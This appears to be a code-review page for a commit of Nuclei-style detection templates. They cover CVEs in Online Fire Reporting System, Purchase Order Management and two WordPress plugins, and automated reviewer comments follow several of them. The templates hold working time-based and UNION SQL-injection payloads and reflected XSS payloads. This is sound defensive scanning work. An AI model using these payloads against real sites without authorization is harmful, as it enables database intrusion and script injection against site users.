max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
POST /classes/Master.php?f=delete_team HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
id='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "status\":\"success\"}")'
|
||||
condition: and
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2022-31978
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_inquiry.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-5.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31978
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-31978
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
POST /classes/Master.php?f=delete_inquiry HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
id='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "status\":\"success")'
|
||||
condition: and
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2022-31980
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/manage_team&id=.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-7.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31980
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2022-31980
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Control Teams")'
|
||||
condition: and
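Review bot: The check is time-based with `SLEEP(6)` and `duration>=6`, but the `method: GET` form leaves nowhere to put a per-request timeout, unlike the raw templates in this commit that start with `@timeout: 10s`. Whether the delayed response is seen at all therefore depends on the runner's default timeout. I would rewrite the request in the raw form used for CVE-2022-31879 and make `@timeout: 10s` its first line. The same applies to CVE-2022-31981, CVE-2022-31982 and CVE-2022-31983. All four carry `PR:H` while sending no session, which should be explained in the description.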
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2022-31981
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/view_team&id=.
|
||||
reference:
|
||||
- https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-6.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31981
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2022-31981
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Control Teams")'
|
||||
condition: and
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2022-31982
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request&id=.
|
||||
reference:
|
||||
- https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-8.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31982
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2022-31982
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Request Detail")'
|
||||
condition: and
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2022-31983
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-9.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31983
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2022-31983
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Request Detail")'
|
||||
condition: and
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2022-31984
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-10.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31984
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2022-31984
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
variables:
|
||||
num: '999999999'
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '{{md5(num)}}'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
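Review bot: The request to `/admin/requests/take_action.php` is sent with no login step, yet the classification is `PR:H` and the tags carry neither `authenticated` nor `unauth`. If the endpoint answers without a session, the CVSS vector and score understate the exposure; if it does not, the template can never match a protected instance. The CVE-2022-31983 template has the same gap. State which case was verified, e.g. a comment `# verified without a session; NVD vector assumes admin privileges` above `http:`, and add the matching tag. The description also gives the path under `/ofrs/`, which the request path omits, so the scan has to be pointed at that base path; that is worth saying in the description.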
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2023-0948
|
||||
|
||||
info:
|
||||
name: WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting
|
||||
author: r3Y3r53
|
||||
severity: medium
|
||||
description: |
|
||||
WordPress Japanized for WooCommerce plugin before 2.5.8 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/a78d75b2-85a0-41eb-9720-c726ca2e8718
|
||||
- https://wordpress.org/plugins/woocommerce-for-japan/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-0948
|
||||
remediation: Fixed in version 2.5.8.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2023-0948
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2023,xss,woocommerce-for-japan,wordpress,wp-plugin,wpscan,wp,authenticated
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=peachpay&tab=field&"><script>alert(/XSS/)</script> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(body_2, "<script>alert(/XSS/)</script>")'
|
||||
- 'contains(body_2, "peachpay")'
|
||||
condition: and
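Review bot: The matcher accepts any 200 response whose body echoes the `<script>` string without checking that the response is HTML, so a reflection inside JSON or plain text would be reported as XSS. Adding `- 'contains(header_2, "text/html")'` to the `dsl` list closes that; the CVE-2023-2122 template that follows has the same omission. `max-request: 1` also disagrees with the two raw requests this template sends (the 2122 template declares 2 for the same shape). The marker is appended after `tab=field&` as a separate query item rather than as the value of `tab`, which the description names as the affected parameter; this should be confirmed against the advisory.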
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2023-2122
|
||||
|
||||
info:
|
||||
name: Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting
|
||||
author: r3Y3r53
|
||||
severity: medium
|
||||
description: |
|
||||
Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
remediation: Fixed in version 1.0.27
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/936fd93a-428d-4744-a4fc-c8da78dcbe78
|
||||
- https://wordpress.org/plugins/image-optimizer-wd/advanced/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-2122
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2023-2122
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
max-request: 2
|
||||
verified: "true"
|
||||
tags: cve,cve2023,xss,image-optimizer-wd,wordpress,wp-plugin,wpscan,wp,authenticated
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(body_2, "<img src=a onerror=alert(document.domain)>")'
|
||||
- 'contains(body_2, "Image optimizer")'
|
||||
condition: and
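Review bot: The fixed version is stated two ways: `name` and `description` say the plugin is affected before 1.0.26, while `remediation` says `Fixed in version 1.0.27`. Whoever triages a hit needs a single upgrade target, so align the three fields with the WPScan advisory listed under `reference` (for example `remediation: Fixed in version 1.0.26`, if that is what the advisory gives).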
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2023-2130
|
||||
|
||||
info:
|
||||
name: Purchase Order Management v1.0 - SQL Injection (Unauthenticated)
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.
|
||||
reference:
|
||||
- https://github.com/zitozito1/bug_report/blob/main/SQLi.md
|
||||
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-2130
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-2130
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2023,sqli,purchase-order-management-system,unauthenticated
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "text/html")'
|
||||
- 'contains(body, "Supplier Name")'
|
||||
condition: and
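Review bot: The tag `unauthenticated` is spelled differently from the `unauth` tag used by the CVE-2023-29623 template for the same product in this commit, so a scan or exclusion filter on `unauth` will silently skip this critical-rated check. Suggested line: `tags: cve,cve2023,sqli,purchase-order-management-system,unauth`. The `metadata` block also has no `max-request` entry, although the template sends a single request; add `max-request: 1` (CVE-2023-29623 lacks it as well).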
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2023-29622
|
||||
|
||||
info:
|
||||
name: Purchase Order Management v1.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.
|
||||
reference:
|
||||
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/SQLi
|
||||
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-29622
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-29622
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2023,sqli,purchase-order,poms
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /classes/Login.php?f=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
username=test&password=test')+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+('orQN'='orQN
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "text/html")'
|
||||
- 'contains(body, "status\":\"incorrect")'
|
||||
condition: and
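Review bot: The description places the flaw at `/purchase_order/admin/login.php`, but the request is a POST to `/classes/Login.php?f=login`, and nothing in the template explains the difference. Someone mapping a finding to server logs or to a WAF rule will look at the wrong path. Either correct the description or add a comment above the raw request, e.g. `# admin login form submits to classes/Login.php?f=login`, if that is the relationship (it cannot be verified from this page). The tags `purchase-order,poms` also differ from `purchase-order-management-system` used by the two sibling templates, which splits the product across tag filters.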
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2023-29623
|
||||
|
||||
info:
|
||||
name: Purchase Order Management v1.0 - Cross Site Scripting (Reflected)
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.
|
||||
reference:
|
||||
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/XSS-Reflected
|
||||
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-29623
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2023-29623
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2023,xss,purchase-order-management-system,unauth
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /classes/Login.php?f=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
username={{randstr}}&password=%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3e
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<img src=x onerror=alert(document.domain)>"
|
||||
- "incorrect"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
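Review bot: The `part: header` word matcher passes when `text/html` appears in any response header, not specifically in Content-Type, and that is the check deciding whether the reflected markup would be rendered. The sibling CVE-2023-29622 template matches `status\":\"incorrect` on the same endpoint, which suggests a JSON-shaped reply, so the declared content type is the part that matters here. A `dsl` matcher with `contains(content_type, "text/html")`, as used in the CVE-2022-31983 template, would pin the check to the right header.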
|
|
@ -0,0 +1,28 @@
|
|||
id: spotweb-login-panel
|
||||
|
||||
info:
|
||||
name: SpotWeb Login Panel - Detect
|
||||
author: theamanrawat
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"SpotWeb - overview"
|
||||
tags: panel,spotweb,detect
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "SpotWeb - overview"
|
||||
- "initSpotwebJs"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
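Review bot: The template is named as a login panel detection, but both body words (`SpotWeb - overview`, `initSpotwebJs`) identify the overview page at the base URL rather than a login form. If the overview is served to anonymous visitors, a match reports product presence, not an exposed login; rename the template or add a word taken from the login form. `verified: true` is also an unquoted boolean, whereas the other templates shown on this page write `verified: "true"`.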
|